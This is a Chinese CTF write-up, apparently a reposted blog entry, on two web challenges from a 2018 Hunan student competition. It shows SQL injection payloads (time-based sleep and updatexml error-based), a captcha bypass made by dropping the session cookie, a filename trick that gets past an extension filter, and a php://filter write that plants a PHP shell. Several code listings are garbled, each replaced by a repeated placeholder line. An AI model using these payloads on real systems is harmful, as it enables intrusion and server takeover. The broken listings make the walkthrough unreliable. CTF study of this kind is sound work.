湖南第二届大学生网络安全技能竞赛web解题记录 – 安全客,安全资讯平台 | xxx湖南第二届大学生网络安全技能竞赛web解题记录 – 安全客,安全资讯平台 – xxx
菜单

湖南第二届大学生网络安全技能竞赛web解题记录 – 安全客,安全资讯平台

十二月 12, 2018 - 安全客

湖南第二届大学生网络安全技能竞赛web解题记录 - 安全客,安全资讯平台

 

0x1前言

​ 有幸去苟了一次湖南的第二届大学生网络安全技能竞赛,除了坐大巴去湘潭大学比较累,比赛环节的待遇还是很好哒(ps.比赛现场有好多湘大漂亮的小姐姐,辛苦哒),感谢主办方精心准备的一次比赛。

回到比赛上来,这次我这个web dog真的太失败了,两道web最终没人A掉,这里我分享下当时自己的做题思路,加上赛后的复现记录。

 

0x2web 200

(一)解题记录

做题首先走一遍题目的流程:

上传 csv => next step=> 保存csv内容到数据库=>insert过程产生注入点

csv的格式很简单:

湖南第二届大学生网络安全技能竞赛web解题记录 - 安全客,安全资讯平台

在http协议里面数据就是 主要看双引号代表一个字段最优先,然后逗号分隔代表一个列

当时我通过csv的保存格式(4,'["123","123","123","123"]','2018-12-08 12:37:24')

猜到了是insert类型的二次注入,这里会有个过滤

‘=> /‘ 导致了单引号可以逃逸,第二行第一个字段输入

123/' or sleep(5),123)# =>(4,'["123/',123)#","123","123","123"]','2018-12-08 12:37:24')

这样也就变成了(4,'["123/' or sleep(5),123) 这样理论来说就逃逸出来了

但是当时比赛的时候我本地进行测试的时候一直爆

ERROR 1292 (22007): Truncated incorrect INTEGER value:

当时我也这样带入了payload然后发现save之后也没延时,就开始怀疑自己的想法了,

当时又因为这道题没人解决出来,想着自己那么菜b应该做不出来,然后放弃了。。emm(心态爆炸那种)

最后1小时主办方给了hint:二次注入

但是我此时已经深陷在web500中不能自拔了。

(二)赛后分析

首先说下我当时测试的时候插入错误的原因:

select @@version;

+-----------+ | @@version | +-----------+ | 5.7.21    | +-----------+ 1 row in set (0.00 sec) 

show variables like "sql_mode";

STRICT_TRANS_TABLES  //严格模式 

mysql 5.7.17 默认开启严格模式

有关严格模式可以可以参考下文章 MySQL sql_mode 说明(及处理一起 sql_mode 引发的问题)

作用:

STRICT_TRANS_TABLES
设置它,表示启用严格模式。
注意 STRICT_TRANS_TABLES 不是几种策略的组合,单独指 INSERTUPDATE出现少值或无效值该如何处理:
1.前面提到的把 ‘’ 传给int,严格模式下非法,若启用非严格模式则变成0,产生一个warning
2.Out Of Range,变成插入最大边界值
3.A value is missing when a new row to be inserted does not contain a value for a non-NULL column

经过我的测试发现了一些小特性:

我在低于mysql 5.7.175.6.35测试发现:

insert into  user(`user`,`pass`) values('123"'^(sleep(5)),'123') 

这样是可以进行插入的,而且会忽略特殊符号,提示warning错误

如果是高版本下的严格模式存在特殊符号是error类型错误导致没办法进行运算,这样时间盲注就失效了

但是有趣的是

mysql> insert into test(`name`,`password`) values('"' or updatexml(1,concat(0x7e,(select user())),0),'123'); ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' 

如果存在报错,那么在严格模式也是可以进行报错的,这个tips可以注意下。

之前看p神的一篇文章说到连接符导致insert出错的问题,用比较运算符来解决问题,我感觉还是有些问题的,

这个还需要去深入研究下。

最后,由于当时我没去测试题目的mysql版本也不知道具体是什么情况,也有可能是我做题的方向就已经出错了,

可能是另外的注入点,欢迎大佬找我交流下。

 

0x3 web500

​ 这道题是我比赛花了很长时间,最终没解出来,感觉特别遗憾的一道题,也让我反思了自己很多问题,比赛

的经验实在是匮乏,导致拖拖拉拉,卡这卡哪,最终,拖了队友的后腿,与第一名差了15分,丢失了第一。

(一)解题记录

当时查看题目页面源代码发现注释提示了

<!--www.zip -->

下载后是两个文件: index.php valicode.php

index.php 是主要的题目文件

valicode.php 是生成验证码的文件

由于代码比较长这里只分析漏洞点的代码

想要源代码我会放上我的githud ctf_web解题记录

结合代码分析下流程:

程序功能(1-68 line):

function register($user, $pass)  function login($user, $pass) function listnote($user) function getnote($id, $user) function savenote($id, $user, $title, $content) function newnote($user, $title, $content)  function delnote($id, $user) 

解题流程:

​ 通过阅读代码发现有一处备份功能可以上传shell 但是需要admin权限,通过sql注入去获取admin权限

​ 正向流程就是:

 sql注入->获取admin密码->备份上传getshell->获取flag 

漏洞点1 SQL盲注

function register($user, $pass) {     global $conn;     $user = '0x' . bin2hex($user);     $pass = '0x' . bin2hex($pass);     $result = $conn->query("select * from user where user=$user");     $data = $result->fetch_assoc();     if ($data) return false;     return $conn->query("insert into user (user,pass) values ($user,$pass)");     } function login($user, $pass) {     global $conn;     $user = '0x' . bin2hex($user);     $result = $conn->query("select * from user where user=$user");     $data = $result->fetch_assoc();     if (!$data) return false;     if ($data['pass'] === $pass) return true;     return false; } 

前几行代码可以看出来进入sql语句的变量都做了hex编码处理

这样除了二次注入是没办法注入

结合题目的描述:很多漏洞都是粗心引起的

然后耐心的看完了所有功能点的代码,最终发现在

function delnote($id, $user) {     global $conn;     $id = (int)$id;     $result = $conn->query("delete from note where id=$id and user='$user'");     return $result; } 

$user 没有进行hex编码拼接进了sql语句,那么回溯下看下传参过程

case 'delete':         if (!$user) {             header("HTTP/1.1 302 Found");             header("Location: ?action=login");         }         $id = (int)$_GET['id'];         var_dump($id);         delnote($id, $user); //调用delnote         header("HTTP/1.1 302 Found");         header("Location: ?action=home"); 

继续回溯

//69-73 $user = $_SESSION['user']; $action = $_GET['action']; $admin = $user === 'admin'; // $conn = mysqli_connect(DB_HOST,DB_USER,DB_PASS,DB_DATABASE) or die("connect to mysql error!"); $conn->query("set names 'utf8'"); 

$user 是由$_SESSION['user'] 决定的

继续寻找下$_SESSION['user']赋值

STRICT_TRANS_TABLES  //严格模式 

0

$_SESSION['user'] = $_POST['user']; 可以看到在登陆成功后把post的user值直接设置给了session

那么思路就来了

通过注册一个注入的语句的用户然后去执行delnote功能,虽然输出报错信息,但是可以通过时间盲注来注入出admin的密码

但是分析流程要注意以下几个问题:

注册是否有限制:

STRICT_TRANS_TABLES  //严格模式 

1

$_POST['code'] != $_SESSION['answer' 这里有个验证码判断,然后跟进去那个注册功能

上面有代码,可以发现hex编码后插入到sql语句中,并没有其他限制。

访问功能点的要求: session['user'] 不为空

需要解决的问题:

​ (1)时间盲注,需要绕过注册和登录时候的验证码

​ (2)解决登陆后,保持cookie状态去请求delnote功能

(1)经典的验证码绕过

验证码工作流程:

STRICT_TRANS_TABLES  //严格模式 

2

登陆界面通过调用valicode.php 然后生成验证码设置全局$_SESSION['answer']的值

然后在index.php

STRICT_TRANS_TABLES  //严格模式 

3

进行了判断

网上很多代码写的验证码就是这样写的,由于session是不可伪造的

安全的写法应该是要判断下$_SESSION['answer']是否非空,然后在进行比较

这里没有那么便会产生漏洞,$_SESSION变量是根据cookie里面的会话sessionid来获取的

那么只要我们删除掉cookie里面的PHPSESSID

然后$_POST[‘code’] 为空,那么验证码就可以绕过了。

STRICT_TRANS_TABLES  //严格模式 

4

你可以本地用这个代码进行验证一下。

(2)解决保持cookie访问功能

当时我搞混了hackhttp和requests

requests是不会存储set-cookie的值

但是可以通过设置 s = requests.session()

来保持会话

(3)需要注意下一些坑点

数据库存储的名字应该是 bin2hex(admin)的值

当时我比赛直接用了admin 一直跑不出来

STRICT_TRANS_TABLES  //严格模式 

5

这里我给出我自己结合题目构造出来的数据库,来进行复现

没有准备,现场写的垃圾脚本,惨痛经历,建议打比赛要自己准备好各类型脚本.

STRICT_TRANS_TABLES  //严格模式 

6

这个脚本也就凑合着用,如果比赛环境较卡的话,这样写的是不行的,要自己写好异常处理,出错判断等用函数封装好,方便比赛快速修改。

获取到用户名和密码 admin admin

漏洞点二 php代码注入(文件上传)

STRICT_TRANS_TABLES  //严格模式 

7

分析下流程: 获取file和id->判断文件名->根据id获取content内容->写入文件->输出文件路径

需要解决问题:

(1)绕过文件名后缀判断

if (preg_match('/.+.ph(p[3457]?|t|tml)$/', $file))

这个正则问题出现在$ 匹配末尾 文件名 1.php/.,在写入的时候会除掉/.

这样就绕过去了

(2)content内容是否可控

STRICT_TRANS_TABLES  //严格模式 

8

可以发现我们可以通过

湖南第二届大学生网络安全技能竞赛web解题记录 - 安全客,安全资讯平台

写入<?php phpinfo();?>

然后在url上获取id进入备份功能

当时我以为这样就ok结果 但是去查看下文件就发现了

<> 被htmlspcialchar转义掉了

这里便有个tips来绕过

以前我们应该做过类似的绕过死亡的exit这些题目 写函数用的是file_put_contents()

参考下p神的文章:谈一谈php://filter的妙用

经过我测试fwrite也是支持php://filter的

那么思路就有了

<?php phpinfo();?> ->base64->PD9waHAgcGhwaW5mbygpOz8+

然后存入note里面获取到对应的id

进入备份功能,文件名:php://filter/write=convert.base64-decode/resource=xq17.php/.

这样便可以实现getshell了

湖南第二届大学生网络安全技能竞赛web解题记录 - 安全客,安全资讯平台

 

0x4比赛感受

​ 之前打完了比赛之后就比较懒惰了,搞的这次比赛没准备好脚本还有整理手头积累的一些知识点,

反正这次web打的很迷,看着雅礼中学那些高中生大佬还有湘大的漂亮小姐姐,自己就被奶死了,搞

得这次web本应做出来的题没做出来,没能苟第一,与一等奖绝缘,还是很遗憾,菜是原罪。(ps苟了个华为ai音箱奖品感觉还是很好哒)


Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51